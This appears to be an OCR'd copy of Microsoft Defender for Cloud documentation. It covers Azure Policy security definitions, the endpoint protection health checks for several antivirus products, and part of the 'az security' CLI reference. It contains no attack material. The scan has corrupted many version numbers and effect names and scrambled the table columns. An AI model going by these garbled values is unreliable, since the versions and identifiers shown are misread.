https://aka.ms/defender-for-resource-manager Z . 

Enabling this Azure Defender plan results in charges. Learn 

about the pricing details per region on Security Center's 

pricing page: https://aka.ms/pricing-security-center@ . 


Azure Defender for servers provides real-time threat DeploylfNotExists, 
protection for server workloads and generates hardening Disabled 
recommendations as well as alerts about suspicious 

activities. 


Azure Defender for SQL provides functionality for surfacing DeploylfNotExists, 
and mitigating potential database vulnerabilities, detecting Disabled 
anomalous activities that could indicate threats to SQL 

databases, and discovering and classifying sensitive data. 


Microsoft Defender for Storage is an Azure-native layer of DeploylfNotExists, 
security intelligence that detects potential threats to your Disabled 

storage accounts. This policy will enable the basic Defender 

for Storage capabilities (Activity Monitoring). To enable full 

protection, which also includes On-upload Malware 

Scanning and Sensitive Data Threat Detection use the full 

enablement policy: aka.ms/DefenderForStoragePolicy. To 

learn more about Defender for Storage capabilities and 

benefits, visit aka.ms/DefenderForStorage. 


Azure Defender includes vulnerability scanning for your DeploylfNotExists, 
machines at no extra cost. You don't need a Qualys license Disabled 

or even a Qualys account - everything's handled seamlessly 

inside Security Center. When you enable this policy, Azure 

Defender automatically deploys the Qualys vulnerability 


Version 


(GitHub) 


1.0.2 2 


1.0.07 


1.0.2 4 


LOTE 


(BARES 


JOE 


4.0.0 £ 


Name 


(Azure portal) 


Configure Microsoft 
Defender CSPM to be 
enabled zZ 


Configure Microsoft 
Defender for Azure 
Cosmos DB to be 
enabled Z 


Configure Microsoft 
Defender for 
Containers to be 
enabled Z 


Configure Microsoft 
Defender for SQL to be 
enabled on Synapse 
workspaces 7 


Configure Microsoft 
Defender for Storage 


(Classic) to be enabled tz 


Configure Microsoft 


Defender for Storage to 


be enabled Z 


Container registry 
images should have 
vulnerability findings 
resolved 7 


Container registry 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) £ 


Deploy - Configure 
suppression rules for 


Description 


assessment provider to all supported machines that don't 
already have it installed. 


Defender Cloud Security Posture Management (CSPM) 
provides enhanced posture capabilities and a new 
intelligent cloud security graph to help identify, prioritize, 
and reduce risk. Defender CSPM is available in addition to 
the free foundational security posture capabilities turned 
on by default in Defender for Cloud. 


Microsoft Defender for Azure Cosmos DB is an Azure- 
native layer of security that detects attempts to exploit 
databases in your Azure Cosmos DB accounts. Defender for 
Azure Cosmos DB detects potential SQL injections, known 
bad actors based on Microsoft Threat Intelligence, 
suspicious access patterns, and potential exploitations of 
your database through compromised identities or 
malicious insiders. 


Microsoft Defender for Containers provides hardening, 
vulnerability assessment and run-time protections for your 
Azure, hybrid, and multi-cloud Kubernetes environments. 


Enable Microsoft Defender for SQL on your Azure Synapse 
workspaces to detect anomalous activities indicating 
unusual and potentially harmful attempts to access or 
exploit SQL databases. 


Microsoft Defender for Storage (Classic) provides 
detections of unusual and potentially harmful attempts to 
access or exploit storage accounts. 


Microsoft Defender for Storage is an Azure-native layer of 
security intelligence that detects potential threats to your 
storage accounts. This policy will enable all Defender for 
Storage capabilities; Activity Monitoring, Malware Scanning 
and Sensitive Data Threat Detection. To learn more about 
Defender for Storage capabilities and benefits, visit 
aka.ms/DefenderForStorage. 


Container image vulnerability assessment scans your 
registry for security vulnerabilities and exposes detailed 
findings for each image. Resolving the vulnerabilities can 
greatly improve your containers’ security posture and 
protect them from attacks. 


Container image vulnerability assessment scans your 
registry for commonly known vulnerabilities (CVEs) and 
provides a detailed vulnerability report for each image. 
Resolving vulnerabilities can greatly improve your security 
posture, ensuring images are safe to use prior to 
deployment. 


Suppress Azure Security Center alerts to reduce alerts 
fatigue by deploying suppression rules on your 
management group or subscription. 


Effect(s) 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


DeploylfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


deploylfNotExists 


Version 


(GitHub) 


1.0.2 4 


1.0.0 4 


1.0.1¢ 


1.0.0 2 


1.0.26 


LLO 


20,12 


1.0.0 % 


1.0.0 % 


Name 
(Azure portal) 


Azure Security Center 
alerts Z 


Deploy export to Event 
Hub as a trusted service 
for Microsoft Defender 
for Cloud data # 


Deploy export to Event 
Hub for Microsoft 
Defender for Cloud 
data? 


Deploy export to Log 
Analytics workspace for 
Microsoft Defender for 
Cloud data 6 


Deploy Workflow 
Automation for 
Microsoft Defender for 
Cloud alerts Z 


Deploy Workflow 
Automation for 
Microsoft Defender for 
Cloud 
recommendations č 


Deploy Workflow 
Automation for 
Microsoft Defender for 
Cloud regulatory 
compliance 


Email notification for 
high severity alerts 
should be enabled Z 


Email notification to 
subscription owner for 
high severity alerts 
should be enabled z 


Description 


Enable export to Event Hub as a trusted service of 
Microsoft Defender for Cloud data. This policy deploys an 
export to Event Hub as a trusted service configuration with 
your conditions and target Event Hub on the assigned 
scope. To deploy this policy on newly created subscriptions, 
open the Compliance tab, select the relevant non- 
compliant assignment and create a remediation task. 


Enable export to Event Hub of Microsoft Defender for 
Cloud data. This policy deploys an export to Event Hub 
configuration with your conditions and target Event Hub on 
the assigned scope. To deploy this policy on newly created 
subscriptions, open the Compliance tab, select the relevant 
non-compliant assignment and create a remediation task. 


Enable export to Log Analytics workspace of Microsoft 
Defender for Cloud data. This policy deploys an export to 
Log Analytics workspace configuration with your conditions 
and target workspace on the assigned scope. To deploy this 
policy on newly created subscriptions, open the 
Compliance tab, select the relevant non-compliant 
assignment and create a remediation task. 


Enable automation of Microsoft Defender for Cloud alerts. 
This policy deploys a workflow automation with your 
conditions and triggers on the assigned scope. To deploy 
this policy on newly created subscriptions, open the 
Compliance tab, select the relevant non-compliant 
assignment and create a remediation task. 


Enable automation of Microsoft Defender for Cloud 
recommendations. This policy deploys a workflow 
automation with your conditions and triggers on the 
assigned scope. To deploy this policy on newly created 
subscriptions, open the Compliance tab, select the relevant 
non-compliant assignment and create a remediation task. 


Enable automation of Microsoft Defender for Cloud 
regulatory compliance. This policy deploys a workflow 
automation with your conditions and triggers on the 
assigned scope. To deploy this policy on newly created 
subscriptions, open the Compliance tab, select the relevant 
non-compliant assignment and create a remediation task. 


To ensure the relevant people in your organization are 
notified when there is a potential security breach in one of 
your subscriptions, enable email notifications for high 
severity alerts in Security Center. 


To ensure your subscription owners are notified when there 
is a potential security breach in their subscription, set email 
notifications to subscription owners for high severity alerts 
in Security Center. 


Effect(s) Version 


(GitHub) 


DeploylfNotExists, 1.0.0 7 
Disabled 


deploylfNotExists 4.2.0 7 


deploylfNotExists 4.1.0 Z 


deploylfNotExists 5.0.1 Z 


deploylfNotExists 5.0.1 


deploylfNotExists 5.0.14 


AuditlfNotExists, 1.0.1 2 
Disabled 


AuditlfNotExists, 2.0.0 Z 
Disabled 


Name 


(Azure portal) 


Enable Microsoft 
Defender for Cloud on 
your subscription ¢ 


Enable Security Center's 
auto provisioning of 
the Log Analytics agent 
on your subscriptions 


with custom workspace. £ 


Enable Security Center's 
auto provisioning of 
the Log Analytics agent 
on your subscriptions 


with default workspace. 2 


Endpoint protection 
health issues should be 
resolved on your 
machines E 


Endpoint protection 
should be installed on 
your machines & 


Endpoint protection 
solution should be 
installed on virtual 
machine scale sets 7 


Guest accounts with 
owner permissions on 
Azure resources should 
be removed č 


Guest accounts with 
read permissions on 
Azure resources should 
be removed Z 


Guest accounts with 
write permissions on 
Azure resources should 
be removed 7 


Guest Configuration 
extension should be 


Description 


Identifies existing subscriptions that aren't monitored by 
Microsoft Defender for Cloud and protects them with 
Defender for Cloud's free features. Subscriptions already 
monitored will be considered compliant. To register newly 
created subscriptions, open the compliance tab, select the 
relevant non-compliant assignment, and create a 
remediation task. 


Allow Security Center to auto provision the Log Analytics 
agent on your subscriptions to monitor and collect security 
data using a custom workspace. 


Allow Security Center to auto provision the Log Analytics 
agent on your subscriptions to monitor and collect security 
data using ASC default workspace. 


Resolve endpoint protection health issues on your virtual 
machines to protect them from latest threats and 
vulnerabilities. Azure Security Center supported endpoint 
protection solutions are documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-services?tabs=features-windows#supported- 
endpoint-protection-solutions. Endpoint protection 
assessment is documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-endpoint-protection. 


To protect your machines from threats and vulnerabilities, 
install a supported endpoint protection solution. 


Audit the existence and health of an endpoint protection 
solution on your virtual machines scale sets, to protect 
them from threats and vulnerabilities. 


External accounts with owner permissions should be 
removed from your subscription in order to prevent 
unmonitored access. 


External accounts with read privileges should be removed 
from your subscription in order to prevent unmonitored 
access. 


External accounts with write privileges should be removed 
from your subscription in order to prevent unmonitored 
access. 


To ensure secure configurations of in-guest settings of your 
machine, install the Guest Configuration extension. In-guest 
settings that the extension monitors include the 


Effect(s) Version 
(GitHub) 

deploylfNotExists 1.0.1 Z 

DeploylfNotExists, 1.0.0 

Disabled 

DeploylfNotExists, 1.0.0 Z 

Disabled 

AuditlfNotExists, 1.0.0 Z 

Disabled 

AuditlfNotExists, 1.0.0 7 

Disabled 

AuditlfNotExists, 3.0.0 2 

Disabled 

AuditlfNotExists, 1.0.0 7 

Disabled 

AuditlfNotExists, 1.0.0 7 

Disabled 

AuditlfNotExists, 1.0.0 2 

Disabled 

AuditlfNotExists, 10.3.62 


Disabled 


Name 


(Azure portal) 


installed on your 
machines E 


Internet-facing virtual 
machines should be 
protected with network 
security groups E 


IP Forwarding on your 
virtual machine should 
be disabled # 


Kubernetes Services 
should be upgraded to 
a non-vulnerable 
Kubernetes version č 


Log Analytics agent 
should be installed on 
your Cloud Services 
(extended support) role 
instances E 


Log Analytics agent 
should be installed on 
your virtual machine for 
Azure Security Center 
monitoring E 


Log Analytics agent 
should be installed on 
your virtual machine 
scale sets for Azure 
Security Center 
monitoring E 


Machines should have 


secret findings resolved 7 


Management ports of 
virtual machines should 
be protected with just- 
in-time network access 
control? 


Management ports 
should be closed on 
your virtual machines Z 


Description 


configuration of the operating system, application 
configuration or presence, and environment settings. Once 
installed, in-guest policies will be available such as 
‘Windows Exploit guard should be enabled’. Learn more at 
https://aka.ms/gcpol £ . 


Protect your virtual machines from potential threats by 
restricting access to them with network security groups 
(NSG). Learn more about controlling traffic with NSGs at 
https://aka.ms/nsg-doc E 


Enabling IP forwarding on a virtual machine's NIC allows 
the machine to receive traffic addressed to other 
destinations. IP forwarding is rarely required (e.g., when 


using the VM as a network virtual appliance), and therefore, 


this should be reviewed by the network security team. 


Upgrade your Kubernetes service cluster to a later 
Kubernetes version to protect against known vulnerabilities 
in your current Kubernetes version. Vulnerability CVE-2019- 
9946 has been patched in Kubernetes versions 1.11.9+, 
1.12.7+, 1.13.5+, and 1.14.0+ 


Security Center collects data from your Cloud Services 
(extended support) role instances to monitor for security 
vulnerabilities and threats. 


This policy audits any Windows/Linux virtual machines 
(VMs) if the Log Analytics agent is not installed which 
Security Center uses to monitor for security vulnerabilities 
and threats 


Security Center collects data from your Azure virtual 
machines (VMs) to monitor for security vulnerabilities and 
threats. 


Audits virtual machines to detect whether they contain 
secret findings from the secret scanning solutions on your 
virtual machines. 


Possible network Just In Time (JIT) access will be monitored 
by Azure Security Center as recommendations 


Open remote management ports are exposing your VM to 
a high level of risk from Internet-based attacks. These 
attacks attempt to brute force credentials to gain admin 
access to the machine. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


3.0.0 Z 


3.0.0 4 


10.212 


2.00% 


1.0.0 2 


1.0.0 6 


10.2 2 


3.0.0 


3.0.0 & 


Name 


(Azure portal) 


Microsoft Defender 
CSPM should be 
enabled Z 


Microsoft Defender for 
Azure Cosmos DB 
should be enabled Z 


Microsoft Defender for 
Containers should be 
enabled Z 


Microsoft Defender for 
SQL should be enabled 
for unprotected 

Synapse workspaces E 


Microsoft Defender for 
SQL status should be 
protected for Arc- 
enabled SQL Servers Z 


Microsoft Defender for 
Storage (Classic) should 
be enabled Z 


Microsoft Defender for 
Storage should be 
enabled zZ 


Monitor missing 
Endpoint Protection in 
Azure Security Center £ 


Non-internet-facing 
virtual machines should 
be protected with 
network security 
groups E 


Description 


Defender Cloud Security Posture Management (CSPM) 
provides enhanced posture capabilities and a new 
intelligent cloud security graph to help identify, prioritize, 
and reduce risk. Defender CSPM is available in addition to 
the free foundational security posture capabilities turned 
on by default in Defender for Cloud. 


Microsoft Defender for Azure Cosmos DB is an Azure- 
native layer of security that detects attempts to exploit 
databases in your Azure Cosmos DB accounts. Defender for 
Azure Cosmos DB detects potential SQL injections, known 
bad actors based on Microsoft Threat Intelligence, 
suspicious access patterns, and potential exploitations of 
your database through compromised identities or 
malicious insiders. 


Microsoft Defender for Containers provides hardening, 
vulnerability assessment and run-time protections for your 
Azure, hybrid, and multi-cloud Kubernetes environments. 


Enable Defender for SQL to protect your Synapse 
workspaces. Defender for SQL monitors your Synapse SQL 
to detect anomalous activities indicating unusual and 
potentially harmful attempts to access or exploit databases. 


Microsoft Defender for SQL provides functionality for 
surfacing and mitigating potential database vulnerabilities, 
detecting anomalous activities that could indicate threats 
to SQL databases, discovering and classifying sensitive 
data. Once enabled, the protection status indicates that the 
resource is actively monitored. Even when Defender is 
enabled, multiple configuration settings should be 
validated on the agent, machine, workspace and SQL server 
to ensure active protection. 


Microsoft Defender for Storage (Classic) provides 
detections of unusual and potentially harmful attempts to 
access or exploit storage accounts. 


Microsoft Defender for Storage detects potential threats to 
your storage accounts. It helps prevent the three major 
impacts on your data and workload: malicious file uploads, 
sensitive data exfiltration, and data corruption. The new 
Defender for Storage plan includes Malware Scanning and 
Sensitive Data Threat Detection. This plan also provides a 
predictable pricing structure (per storage account) for 
control over coverage and costs. 


Servers without an installed Endpoint Protection agent will 
be monitored by Azure Security Center as 
recommendations 


Protect your non-internet-facing virtual machines from 
potential threats by restricting access with network security 
groups (NSG). Learn more about controlling traffic with 
NSGs at https://aka.ms/nsg-doc E 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.0 4 


1.0.07 


1.0.0¢ 


1.0.0 4 


1.0.1 4 


1.0.4 Z 


1.0.0 4 


3.0.0 Z 


3.0.0 4 


Name 


(Azure portal) 


Running container 
images should have 
vulnerability findings 
resolved %7 


Running container 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) E 


Security Center 
standard pricing tier 
should be selected £ 


Setup subscriptions to 
transition to an 
alternative vulnerability 
assessment solution č 


SQL databases should 
have vulnerability 
findings resolved 7 


SQL servers on 
machines should have 
vulnerability findings 
resolved 7 


Subnets should be 
associated with a 
Network Security 
Group č 


Subscriptions should 
have a contact email 
address for security 
issues Z 


System updates on 
virtual machine scale 


sets should be installed Z 


System updates should 
be installed on your 
machines E 


Description 


Container image vulnerability assessment scans container 
images running on your Kubernetes clusters for security 
vulnerabilities and exposes detailed findings for each 
image. Resolving the vulnerabilities can greatly improve 
your containers’ security posture and protect them from 
attacks. 


Container image vulnerability assessment scans your 
registry for commonly known vulnerabilities (CVEs) and 
provides a detailed vulnerability report for each image. This 
recommendation provides visibility to vulnerable images 
currently running in your Kubernetes clusters. Remediating 
vulnerabilities in container images that are currently 
running is key to improving your security posture, 
significantly reducing the attack surface for your 
containerized workloads. 


The standard pricing tier enables threat detection for 
networks and virtual machines, providing threat 
intelligence, anomaly detection, and behavior analytics in 
Azure Security Center 


Microsoft Defender for cloud offers vulnerability scanning 
for your machines at no extra cost. Enabling this policy will 
cause Defender for Cloud to automatically propagate the 
findings from the built-in Microsoft Defender vulnerability 
management solution to all supported machines. 


Monitor vulnerability assessment scan results and 
recommendations for how to remediate database 
vulnerabilities. 


SQL vulnerability assessment scans your database for 
security vulnerabilities, and exposes any deviations from 
best practices such as misconfigurations, excessive 
permissions, and unprotected sensitive data. Resolving the 
vulnerabilities found can greatly improve your database 
security posture. 


Protect your subnet from potential threats by restricting 
access to it with a Network Security Group (NSG). NSGs 
contain a list of Access Control List (ACL) rules that allow or 
deny network traffic to your subnet. 


To ensure the relevant people in your organization are 
notified when there is a potential security breach in one of 
your subscriptions, set a security contact to receive email 
notifications from Security Center. 


Audit whether there are any missing system security 
updates and critical updates that should be installed to 
ensure that your Windows and Linux virtual machine scale 
sets are secure. 


Missing security system updates on your servers will be 
monitored by Azure Security Center as recommendations 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Audit, Disabled 


DeploylfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


1.0.2 g 


1.0.07 


11.0% 


1.0.0- 
preview E 


41.0% 


1.0.0 Z 


30.06 


TOTE 


3006 


4.0.0 £ 


Name 


(Azure portal) 


There should be more 
than one owner 
assigned to your 
subscription £ 


Virtual machines should 
encrypt temp disks, 
caches, and data flows 
between Compute and 
Storage resources E 


Virtual machines' Guest 
Configuration 
extension should be 
deployed with system- 
assigned managed 
identity E 


Vulnerabilities in 
container security 
configurations should 
be remediated Z 


Vulnerabilities in 
security configuration 
on your machines 
should be remediated ¢ 


Vulnerabilities in 
security configuration 
on your virtual machine 
scale sets should be 
remediated č 


Next steps 


Description 


It is recommended to designate more than one 
subscription owner in order to have administrator access 
redundancy. 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys. Temp 
disks, data caches and data flowing between compute and 


storage aren't encrypted. Disregard this recommendation if: 


1. using encryption-at-host, or 2. server-side encryption on 
Managed Disks meets your security requirements. Learn 
more in: Server-side encryption of Azure Disk Storage: 
https://aka.ms/disksse, £ Different disk encryption 
offerings: https://aka.ms/diskencryptioncomparison € 


The Guest Configuration extension requires a system 
assigned managed identity. Azure virtual machines in the 
scope of this policy will be non-compliant when they have 
the Guest Configuration extension installed but do not 
have a system assigned managed identity. Learn more at 
https://aka.ms/gcpol £ 


Audit vulnerabilities in security configuration on machines 
with Docker installed and display as recommendations in 
Azure Security Center. 


Servers which do not satisfy the configured baseline will be 
monitored by Azure Security Center as recommendations 


Audit the OS vulnerabilities on your virtual machine scale 
sets to protect them from attacks. 


Effect(s) 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


AuditlfNotExists, 
Disabled 


Version 


(GitHub) 


3.0.0 Z 


2032 


1.0.1 2 


3.0.0 


3.1.04 


3.0.0 Z 


In this article, you learned about Azure Policy security policy definitions in Defender for Cloud. To learn 


more about initiatives, policies, and how they relate to Defender for Cloud's recommendations, see What 


are security policies, initiatives, and recommendations?. 


Endpoint protection assessment and 
recommendations in Microsoft 
Defender for Cloud 


Article e 08/30/2023 


O Note 


As the Log Analytics agent (also known as MMA) is set to retire in August 2024”, 
all Defender for Servers features that currently depend on it, including those 
described on this page, will be available through either Microsoft Defender for 
Endpoint integration or agentless scanning, before the retirement date. For more 
information about the roadmap for each of the features that are currently rely on 
Log Analytics Agent, see this announcement. 


Microsoft Defender for Cloud provides health assessments of supported versions of 
Endpoint protection solutions. This article explains the scenarios that lead Defender for 
Cloud to generate the following two recommendations: 


e Endpoint protection should be installed on your machines E 
e Endpoint protection health issues should be resolved on your machines E 


Q Tip 


At the end of 2021, we revised the recommendation that installs endpoint 
protection. One of the changes affects how the recommendation displays machines 
that are powered off. In the previous version, machines that were turned off 
appeared in the ‘Not applicable’ list. In the newer recommendation, they don't 
appear in any of the resources lists (healthy, unhealthy, or not applicable). 


Windows Defender 


e Defender for Cloud recommends Endpoint protection should be installed on your 
machines when Get-MpComputerStatus runs and the result is AMServiceEnabled: 
False 


e Defender for Cloud recommends Endpoint protection health issues should be 
resolved on your machines when Get-MpComputerStatus runs and any of the 


following occurs: 


o Any of the following properties are false: 
o AMServiceEnabled 
o AntispywareEnabled 
o RealTimeProtectionEnabled 
o BehaviorMonitorEnabled 
o loavProtectionEnabled 
o OnAccessProtectionEnabled 


o If one or both of the following properties are 7 or more: 
o AntispywareSignatureAge 
o AntivirusSignatureAge 


Microsoft System Center endpoint protection 


e Defender for Cloud recommends Endpoint protection should be installed on your 
machines when importing SCEPMpModule ("$env:ProgramFiles\Microsoft 
Security Client\MpProvider\MpProvider.psd1") and running Get- 
MProtComputerStatus results in AMServiceEnabled = false. 


e Defender for Cloud recommends Endpoint protection health issues should be 
resolved on your machines when Get-MprotComputerStatus runs and any of the 
following occurs: 


o At least one of the following properties is false: 
o AMServiceEnabled 
o AntispywareEnabled 
o RealTimeProtectionEnabled 
o BehaviorMonitorEnabled 
o loavProtectionEnabled 
o OnAccessProtectionEnabled 


o If one or both of the following Signature Updates are greater or equal to 7: 
o AntispywareSignatureAge 
o AntivirusSignatureAge 


Trend Micro 


e Defender for Cloud recommends Endpoint protection should be installed on your 
machines when any of the following checks aren't met: 
o HKLM:\SOFTWARE\TrendMicro\Deep Security Agent exists 


o HKLM:\SOFTWARE\TrendMicro\Deep Security Agent\InstallationFolder exists 

o The dsa_query.cmd file is found in the Installation Folder 

o Running dsa_query.cmd results with Component.AM.mode: on - Trend Micro 
Deep Security Agent detected 


Symantec endpoint protection 


Defender for Cloud recommends Endpoint protection should be installed on your 


machines when any of the following checks aren't met: 


HKLM:\Software\Symantec\Symantec Endpoint 
Protection\CurrentVersion\PRODUCTNAME = "Symantec Endpoint Protection" 
HKLM:\Software\Symantec\Symantec Endpoint 
Protection\CurrentVersion\public-opstate\ASRunningStatus = 1 


HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint 
Protection\CurrentVersion\PRODUCTNAME = "Symantec Endpoint Protection" 
HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint 
Protection\CurrentVersion\public-opstate\ASRunningStatus = 1 


Defender for Cloud recommends Endpoint protection health issues should be resolved 


on your machines when any of the following checks aren't met: 


Check Symantec Version >= 12: Registry location: 
HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion" - 
Value "PRODUCTVERSION" 

Check Real-Time Protection status: 
HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint 
Protection\AV\Storages\Filesystem\RealTimeScan\OnOff == 

Check Signature Update status: HKLM\Software\Symantec\Symantec Endpoint 
Protection\CurrentVersion\public-opstate\LatestVirusDefsDate <= 7 days 
Check Full Scan status: HKLM:\Software\Symantec\Symantec Endpoint 
Protection\CurrentVersion\public-opstate\LastSuccessfulScanDateTime <= 7 
days 

Find signature version number Path to signature version for Symantec 12: Registry 
Paths+ "CurrentVersion\SharedDefs" -Value "SRTSP" 

Path to signature version for Symantec 14: Registry Paths+ 
“CurrentVersion\SharedDefs\SDSDefs" -Value "SRTSP" 


Registry Paths: 


e "HKLM:\Software\Symantec\Symantec Endpoint Protection" + $Path; 
e "HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint Protection" + 
$Path 


McAfee endpoint protection for Windows 


Defender for Cloud recommends Endpoint protection should be installed on your 


machines when any of the following checks aren't met: 


e HKLM:\SOFTWARE\MCcAfee\Endpoint\AV\ProductVersion exists 
e HKLM:\SOFTWARE\MCcAfee\AVSolution\MCSHIELDGLOBAL\GLOBAL\enableoas 
=1 


Defender for Cloud recommends Endpoint protection health issues should be resolved 


on your machines when any of the following checks aren't met: 


e McAfee Version: HKLM:\SOFTWARE\McAfee\Endpoint\AV\ProductVersion >= 10 

e Find Signature Version: HKLM:\Software\McAfee\AVSolution\DS\DS -Value 
"dwContentMajorVersion" 

e Find Signature date: HKLM:\Software\McAfee\AVSolution\DS\DS -Value 
"szContentCreationDate" >= 7 days 

e Find Scan date: HKLM:\Software\McAfee\Endpoint\AV\ODS -Value 
"LastFullScanOdsRunTime" >= 7 days 


McAfee Endpoint Security for Linux Threat 
Prevention 


Defender for Cloud recommends Endpoint protection should be installed on your 
machines when any of the following checks aren't met: 


e File /opt/McAfee/ens/tp/bin/mfetpcli exists 
e "/opt/McAfee/ens/tp/bin/mfetpcli --version" output is: McAfee name = McAfee 
Endpoint Security for Linux Threat Prevention and McAfee version >= 10 


Defender for Cloud recommends Endpoint protection health issues should be resolved 
on your machines when any of the following checks aren't met: 


e "/opt/McAfee/ens/tp/bin/mfetpcli --listtask" returns Quick scan, Full scan and 
both of the scans <= 7 days 

e "/opt/McAfee/ens/tp/bin/mfetpcli --listtask" returns DAT and engine Update 
time and both of them <= 7 days 


e "/opt/McAfee/ens/tp/bin/mfetpcli --getoasconfig --summary" returns On 
Access Scan status 


Sophos Antivirus for Linux 


Defender for Cloud recommends Endpoint protection should be installed on your 
machines when any of the following checks aren't met: 


e File /opt/sophos-av/bin/savdstatus exits or search for customized location 
"readlink $(which savscan)" 

e "/opt/sophos-av/bin/savdstatus --version” returns Sophos name = Sophos Anti- 
Virus and Sophos version >= 9 


Defender for Cloud recommends Endpoint protection health issues should be resolved 
on your machines when any of the following checks aren't met: 


e "/opt/sophos-av/bin/savlog --maxage=7 | grep -i "Scheduled scan .* 
completed" | tail -1", returns a value 

e "/opt/sophos-av/bin/savlog --maxage=7 | grep "scan finished" | tail -1", returns a 
value 

e "/opt/sophos-av/bin/savdstatus --lastupdate" returns lastUpdate, which should 
be <= 7 days 

e "/opt/sophos-av/bin/savdstatus -v" is equal to "On-access scanning is running" 

e "/opt/sophos-av/bin/savconfig get LiveProtection” returns enabled 


Troubleshoot and support 


Troubleshoot 


Microsoft Antimalware extension logs are available at: 
%Systemdrive%\WindowsAzure\Logs\Plugins\Microsoft.Azure.Security.laaSAntimalwa 
re(Or PaaSAntimalware)\1.5.5.x(version#)\CommandExecution.log 


Support 


For more help, contact the Azure experts on the MSDN Azure and Stack Overflow 
forums E, Or file an Azure support incident. Go to the Azure support site“ and select 
Get support. For information about using Azure Support, read the Microsoft Azure 


support common questions ”. 


az security 


Reference 


Manage your security posture with Microsoft Defender for Cloud. 


Commands 


Name 


az security adaptive-application- 
controls 


az security adaptive-application- 
controls list 


az security adaptive-application- 
controls show 


az security 
adaptive_network_hardenings 


az security 
adaptive_network_hardenings list 


az security 
adaptive_network_hardenings 
show 


az security alert 

az security alert list 

az security alert show 
az security alert update 


az security alerts-suppression- 
rule 


az security alerts-suppression- 
rule delete 


az security alerts-suppression- 
rule delete_scope 


az security alerts-suppression- 
rule list 


Description 


Enable control which applications can run 
on your Azure and non-Azure machines 
(Windows and Linux). 


Adaptive Application Controls - List. 


Adaptive Application Controls - Get. 


View all Adaptive Network Hardening 


resources. 


Gets a list of Adaptive Network Hardenings 


resources in scope of an extended resource. 


Gets a single Adaptive Network Hardening 
resource. 


View security alerts. 

List security alerts. 

Shows a security alert. 
Updates a security alert status. 


View and manage alerts suppression rules. 


Delete an alerts suppression rule. 


Delete an alerts suppression rule scope. 


List all alerts suppression rule ona 
subscription scope. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security alerts-suppression- 
rule show 


az security alerts-suppression- 
rule update 


az security alerts-suppression- 
rule upsert_scope 


az security allowed_connections 


az security allowed_connections 
list 


az security allowed_connections 
show 


az security assessment 
az security assessment-metadata 


az security assessment-metadata 
create 


az security assessment-metadata 
delete 


az security assessment-metadata 
list 


az security assessment-metadata 
show 


az security assessment create 


az security assessment delete 
az security assessment list 
az security assessment show 


az security atp 


az security atp cosmosdb 


Description 


Shows an alerts suppression rule. 


Updates or create an alerts suppression rule. 


Update an alerts suppression rule with 
scope element. 


View all possible traffic between resources 
for the subscription and location, based on 
connection type. 


List of all possible traffic between resources 
for the subscription. 


List all possible traffic between resources for 
the subscription and location, based on 
connection type. 


View your security assessment results. 
View your security assessment metadata. 


Creates a customer managed security 
assessment type. 


Deletes a security assessment type and all 
it's assessment results. 


List all security assessment results. 


Shows a security assessment. 


Creates a customer managed security 
assessment. 


Deletes a security assessment. 
List all security assessment results. 
Shows a security assessment. 


View and manage Advanced Threat 
Protection settings. 


View and manage Advanced Threat 
Protection settings for Cosmos DB accounts. 


Type 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 


Core 
Core 
Core 


Core 


Core 


Status 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


GA 


Name 


az security atọ cosmosdb show 


az security atọ cosmosdb update 


az security atp storage 


az security atp storage show 


az security atp storage update 


az security auto-provisioning- 
setting 


az security auto-provisioning- 
setting list 


az security auto-provisioning- 
setting show 


az security auto-provisioning- 
setting update 


az security automation 


az security automation-action- 
event-hub 


az security automation-action- 
event-hub create 


az security automation-action- 
logic-app 


az security automation-action- 
logic-app create 


az security automation-action- 
workspace 


az security automation-action- 
workspace create 


az security automation-rule 


az security automation-rule-set 


Description 


Display Advanced Threat Protection settings 
for an Azure Cosmos DB account. 


Toggle status of Advanced Threat Protection 
for an Azure Cosmos DB account. 


View and manage Advanced Threat 
Protection settings for storage accounts. 


Display Advanced Threat Protection settings 
for a storage account. 


Toggle status of Advanced Threat Protection 
for a storage account. 


View your auto provisioning settings. 


List the auto provisioning settings. 


